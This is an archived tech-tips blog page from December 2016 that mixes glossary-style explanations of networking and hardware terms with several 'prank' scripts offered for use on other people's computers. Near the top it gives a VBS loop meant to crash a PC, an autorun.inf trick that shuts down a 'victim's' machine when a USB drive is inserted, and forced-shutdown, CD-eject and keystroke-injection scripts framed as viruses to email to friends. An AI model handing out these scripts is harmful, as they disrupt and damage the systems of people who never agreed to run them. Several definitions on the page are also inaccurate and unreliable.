Skip to main content

Posts

Showing posts from December, 2016

How To Crash Computer With Only One Click.

Step 1 >> Open Notepad. Step 2 >> Copy This Code. Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Step 3 >> Save It As Anything.vbs Step 4 >> Run It.

How To Shutdown Computer Using Pendrive.

Step 1: >>copy this  code into notepad: @echo off shutdown -s -t 00 Save as fun.bat extension (for eg: clickme.bat). Step 2:  Now open the notepad and copy this code: [autorun] Open=filename.bat Action=Mouse Disable Save it as "autorun.inf" //don't forget to change the "filname.bat" with your filname.bat. Step 3:  Then copy the two files in your pen drive or victim's pen drive. That's all whenever the victim insert his pen drive,the system will be turned off automatically.

10 Most Dangerous Computer scripts.

NOTE: ALL THESE SCRIPTS SHOULD WRITE IN NOTE PAD ONLY THEN WORKS ELSE NOT WORK: 1) Convey your friend a little message and shut down his / her computer: Type in note pad : @echo off msg * I don''t like you shutdown -c ''Error! You are too stupid!'' -s  Save it as ''Anything.BAT'' in All Files and send it. 2) Toggle your friend''s Caps Lock button simultaneously: Type in note pad : Set wshShell =wscript.CreateObject (''WScript.Shell'') do wscript.sleep 100 wshshell.sendkeys ''{CAPSLOCK}'' loop Save it as ''Anything.VBS'' and send it. 3) Continually pop out your friend''s CD Drive. If he / she has more than one, it pops out all of them!   Type in note pad : Set oWMP = CreateObject(''WMPlayer.OCX.7'')Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item.Eject Next For i...

Use Your Photo As an ICON.

Steps 1.Open MSPAINT 2.opn any image file 3.go to "saveas"filename="anything" save as type="24bit bitmap (*.bmp,*.bid) save in: mydocument; 4.now right clk on any folder 5.goto PROPERTIES-CUSTOMIZE-CHANGEICON-BROWSE-MYDOCUMENT- "ANYTHING"then press ok.

Useful Commands for Kali Linux.

So here is a list for some of the basic commands for Kali Linux  Let's start with  details of commands 1. Command: ls The command “ls” stands for (List Directory Contents), List the contents of the folder, be it file or folder, from which it runs. The most common options are -a (all files) and -l (long or details) Tab completion is supported and may be configured with .inputrc When output to file the files are listed one per line. By default, colour is not used to distinguish types of files. That is equivalent to using --color=none. Using the --color option without the optional WHEN argument is equivalent to using --color=always. With --color=auto, color codes are output only if standard output is connected to a terminal (tty). A.Command “ls -a“, list the content of folder, including hidden files the hidden files is colored blue 2. Command: lsblk The “lsblk” stands for (List Block Devices), print block devices by their assigned name (but not RAM) on the ...

Create a real virus to hack friend's keyboard function.

This trick can hack your friend's keyboard and make him type what you say. Just follow the step:<br /> Open Notepad, copy the code given below and save the file as virus.vbs Set wshShell = wscript.CreateObject ("WScript.Shell") do   wscript.sleep 100 wshshell.sendkeys "HI I AM YOUR NAME. I HACKED YOUR COMPUTER " loop Send this file to your friends in email. When they open it, he is hacked.

How To Remove All Your Google Web History?

As most of you already know, Google keeps a tab on pretty much everything you do on a Google site, provided that you signed in on any one of these websites. Everything you do is recorded, and can be used against you in the future. Search data can reveal particularly sensitive information about you, such as facts about your location, interests, age, religious views, and so on. You can, however, choose to not be so vulnerable, and can remove all of your Google web history to protect yourself from an unforeseen eventuality. In this post, I'll show you how to remove your entire Google web history. Before we begin, please note that any data you remove will be deleted permanently. Google keeps a lot of useful information that helps you find what you're looking for faster. It gives you quick access to webpages you've visited in the past, and even lets you know in search results which pages you've visited, and when. This information can be useful if you're a power use...

How To Save Web Page To PDF File ?

In this post i will teach a simple trick or browser feature that let you convert any web page into PDF file format, which might help you to read your favorite articles offline. So lets get started. 1. Open the Google Chrome Browser on your PC or MAC 2. Then go to the web page that you want to convert as a PDF. 3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 4. Now Change the destination to “Save As PDF” and hit the save button. 5. The current web page will instantly be downloaded as a PDF document.

Useful Run Commands.

You can use Run command to open any program, file etc. Here I am summarizing most run commands for you hope this will help you. Command                         Action Calc                             Calculator ЁЯУЯ firefox                        Mozilla Firefox ЁЯМН iexplore                     Internet Explorer ЁЯМО winword                   Microsoft Word ЁЯУЭ excel                          Microsoft Excel ЁЯУД powerpnt                 Microsoft Powerpoint ЁЯЕ┐ outlook                       Microsoft Outlook ЁЯЕ╛ notepad       ...

How To Format Drive Through Command Prompt ?

Step 1: Open CMD with administrator priviledge by using Run As Administrator. Command will open in admin mode like this. Step 2: Run following command, suppose i want to format D: drive then command will be Step 3:           (format with FAT32 File System)                   format  D: /fs:fat32 /q                (format with NTFS File System)                     format  D: /fs:ntfs /q then system will ask for volume name and press y for confirmation and press enter.

How to configure PAT in CCNA ?

How to Configure CCNA Point-to-point Connection ?

How to configure CCNA static NAT ?

How to Configure CCNA Dynamic Nat ?

How Many types of Hackers ?

There are good and bad hackers. Here is a window into what they do and why: White Hat Hackers:   These are the good guys, computer security experts who specialize in penetration testing and other methodologies to ensure that a company’s information systems are secure. These IT security professionals rely on a constantly evolving arsenal of technology to battle hackers. Black Hat Hackers:  These are the bad guys, who are typically referred to as just plain hackers. The term is often used specifically for hackers who break into networks or computers, or create computer viruses. Black hat hackers continue to technologically outpace white hats. They often manage to find the path of least resistance, whether due to human error or laziness, or with a new type of attack. Hacking purists often use the term “crackers” to refer to black hat hackers. Black hats’ motivation is generally to get paid. Script Kiddies:  This is a derogatory term for black hat hackers who use ...

What is PNG image ?

Type of format Portable Network Graphics (PNG /╦Иp╔к┼Л/) is a raster graphics file format that supports lossless data compression. PNG was created as an improved, non-patented replacement for Graphics Interchange Format (GIF), and is the most widely used lossless image compression format on the Internet.

What is PDF file ?

PDF (Portable Document Format) is a file format that has captured all the elements of a printed document as an electronic image that you can view, navigate, print, or forward to someone else. PDF files are created using Adobe Acrobat , Acrobat Capture, or similar products.

What is the name of the KILL signal ?

In Unix and Unix-like operating systems, kill is a command used to send a signal to a process. By default, the message sent is the termination signal, which requests that the process exit. But kill is something of a misnomer; the signal sent may have nothing to do with process killing.

What is a Linux inode ?

An inode is an entry in inode table, containing information ( the metadata ) about a regular file and directory. An inode is a data structure on a traditional Unix-style file system such as ext3 or ext4. Inode number also called as index number , it consists following attributes.

How many bytes are necessary to store a MAC address?

The MAC address is a unique value associated with a network adapter. MAC addresses are also known as hardware addresses or physical addresses. They uniquely identify an adapter on a LAN. MAC addresses are 12-digit hexadecimal numbers (48 bits in length).

What is Debug Card ?

4 Digit Debug Card Find Motherboard Faults Diagnoses. Both ISA bus and PCI bus are suitable. Determine defects by difference sounds coding with build-in speaker. It can diagnosis the motherboard signal which show the problem of CPU, Memory, video card, etc.

What is Southbridge ?

A typical north/southbridge layout. The southbridge is one of the two chips in the core logic chipset on a personal computer (PC) motherboard, the other being the northbridge. The southbridge typically implements the slower capabilities of the motherboardin a northbridge/southbridge chipset computer architecture.

What is Northbridge ?

Northbridge is an Intel chipset that communicates with the computer processor and controls interaction with memory, the Peripheral Component Interconnect (PCI) bus, Level 2 cache, and all Accelerated Graphics Port (AGP) activities. Northbridge is one part of a two-part chipset called Northbridge/Southbridge.

What is Motherboard ?

A motherboard is one of the most essential parts of a computer system. It holds together many of the crucial components of a computer, including the central processing unit (CPU), memory and connectors for input and output devices.

What is Wi-Fi Network ?

Wi-Fi is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. A common misconception is that the term Wi-Fi is short for "wireless fidelity," however this is not the case. Wi-Fi is simply a trademarked phrase that means IEEE 802.11x.

What is Wireless Networking ?

Wireless networking is a method by which homes, telecommunications networks and enterprise (business) installations avoid the costly process of introducing cables into a building, or as a connection between various equipment locations.

What is Bluetooth ?

Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz) from fixed and mobile devices, and building personal area networks (PANs).

What is Modem ?

A modem is a device or program that enables a computer to transmit data over, for example, telephone or cable lines. Computer information is stored digitally, whereas information transmitted over telephone lines is transmitted in the form of analog waves.

What is DNS server ?

A DNS server is any computer registered to join the Domain Name System. A DNS server runs special-purpose networking software, features a public IP address, and contains a database of network names and addresses for other Internet hosts.

What is MAC feltering ?

In computer networking, MAC Filtering(or GUI filtering, or layer 2 address filtering) refers to a security access control method whereby the 48-bit address assigned to each network card is used to determine access to the network.

What is Repeater ?

A repeater is a network device that retransmits a received signal with more power and to an extended geographical or topological network boundary than what would be capable with the original signal. A repeater is implemented in computer networks to expand the coverage area of the network, repropagate a weak or broken signal and or service remote nodes. Repeaters amplify the received/input signal to a higher frequency domain so that it is reusable, scalable and available. Repeaters were introduced in wired data communication networks due to the limitation of a signal in propagating over a longer distance and now are a common installation in wireless networks for expanding cell size. Repeaters are also known as signal boosters.

What is Compact Disk ?

A compact disc [sometimes spelled disk] (CD) is a small, portable, round medium made of molded polymer (close in size to the floppy disk) for electronically recording, storing, and playing back audio, video, text, and other information in digital form. Tape cartridges and CDs generally replaced the phonograph record for playing back music. At home, CDs have tended to replace the tape cartridge although the latter is still widely used in cars and portable playback devices.

What is floppy disk ?

A floppy disk is a magnetic storage medium for computer systems. The floppy disk is composed of a thin, flexible magnetic disk sealed in a square plastic carrier. In order to read and write data from a floppy disk, a computer system must have a floppy disk drive (FDD).

What is Minimum Hardware Requirements for Windows Operating systems 7, 8.1, 10 & XP ?

Processor: 1 gigahertz (GHz) or faster. RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Free hard disk space: 16 GB. Graphics card: Microsoft DirectX 9graphics device with WDDMdriver. Processor: 1 gigahertz (GHz) or faster. RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Hard disk space: 16 GB (32-bit) or 20 GB (64-bit) Graphics card: Microsoft DirectX 9 graphics device with WDDM driver. If you want to run Windows 7 on your PC, here's what it takes: 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor*1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)16 GB available hard disk space (32-bit) or 20 GB (64-bit)DirectX 9 graphics device with WDDM 1.0 or higher driver. The minimum hardware requirements for Windows XP Home Edition are: Pentium 233-megahertz (MHz) processor or faster (300 MHz is recommended)At least 64 megabytes (MB) of RAM (128 MB is recommended)At least 1.5 gigabytes (GB) of available space on the hard diskCD-ROM or DV...

What is windows PowerShell ?

A shell can be command-line based or it can include a graphical user interface (GUI). Windows PowerShellis a shell developed by Microsoft for purposes of task automation and configuration management. This powerful shell is based on the .NET framework and it includes a command-line shell and a scripting language.

What is Run Command ?

On the Microsoft Windows operating system, the Run command is used to directly open an application or document whose path is known. It functions more or less like a single-line command line interface. In the GNOME interface, the Run command is used to run applications via terminal commands.

What is File System ?

A filesystem is the methods and data structures that an operating system uses to keep track of files on a disk or partition; that is, the way the files are organized on the disk. The word is also used to refer to a partition or disk that is used to store the files or the type of the filesystem.

What is Ethernet ?

Ethernet is a part of the Local Area Network ( LAN ) products and works as per the specifications of IEEE 802.3 standards. It is responsible for transmitting the data from one Network to the other. The most commonly used Ethernet types is the Fast Ethernet ( 100 Mbps ) and Gigabit Ethernet ( 1000 Mbps ).

What is Modes of Transmission ?

The mode of Transmission defines the direction of singal flow between the connected devices. The different Modes of Transmission are:                                  Simplex                              Half Duplex                              Full Duplex

Types of Topologies

Network topology refer to the configuration or the manner in which the computers and Network devices are connected. The two types of Topologies are physical Topology and logical topology. The Local Area Network ( LAN ) exhibition both the types of Topologies. In addition, Network topology depends on factors such as, number of devices connected, data transfer rates, response time and cost. 1) Physical topology Represent the physical layout of devices on a network. It refers to the arrangement of the device on the network and the way they communicate with each other. The five basic physical Topologies are Bus, Star, Ring, Tree and Mesh. 2) Logical topology  Represents the way the data is transferred from one device to the next irrespective of the physical interconnection of the devices.

What is Network ? & Types of Networks

A network is a collection of computers connected to each other with the help of networking devices . A network is classified on the basis of its size, ownership, distance covered and physical architecture. The different types of network are 1) Local Area Network ( LAN ЁЯМО ) 2) Metropolitan Area Network ( MAN ЁЯМН ) 3) Wide Area Network ( WAN ЁЯЧ║ )

What is CMD [ Command prompt ] ?

I assume you're talking about cmd.exe on Windows. The first operating system Microsoft released on PCs was MS-DOS. The entire user interface for it was just like what you see when you run cmd.exe. For 10 years after Microsoft started producing Windows, DOS applications were still popular. Windows ran as an application on top of DOS. At first, people used to boot into DOS, and then run win.exe to get into Windows, if they needed it. At some point it became possible to run DOS apps. inside of Windows, using the Command Window. Windows would simulate the operating environment of DOS so that DOS applications would think they had the machine all to themselves. This continued through the 1990s, and into the early 2000s. Eventually, Microsoft stopped supporting DOS applications inside the Command Window, and turned it into a 32-bit console environment. It was possible to write programs that would only run inside a command window, but they would not run on the old MS-DOS. System admi...